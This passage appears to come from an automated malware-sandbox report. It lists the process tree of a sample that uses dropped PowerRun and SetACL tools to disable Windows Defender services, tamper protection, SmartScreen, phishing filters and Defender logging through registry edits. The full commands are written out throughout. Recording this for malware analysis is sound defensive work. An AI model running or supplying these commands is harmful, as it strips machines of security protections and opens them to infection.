        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2752
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3000
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2244
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1280
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4940
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1904
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3328
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:5008
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:5116
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5040
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1852
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4272
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1300
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1524
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2208
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        Modifies security service
        
        PID:3588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4940
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:3428
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4256
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3356
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1780
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2828
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4864
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4048
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:772
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1904
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1116
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2528
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2564
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1800
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:1052
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Windows security modification
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Windows security modification
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:1576
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4848
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4644
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2252
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4228
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1828
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:848
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2168
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:368
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Get-MpPreference"
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
        5⤵
        
        PID:5020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\do64.bat
      4⤵
      PID:4584
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:3872
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:4360
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:4208
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:2620
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:1660
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:848
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL64.exe
        
        SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:2508
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1524
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4008
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
        5⤵
        
        PID:1860
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1620
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
        5⤵
        Modifies Windows Defender notification settings
        
        PID:3580
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:392
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:3456
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1412
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2492
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3504
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2812
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4496
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
        5⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1228
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1936
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4592
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2092
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:112
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:3408
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:924
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:1424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:4480
    - - C:\Windows\SysWOW64\reg.exe
        
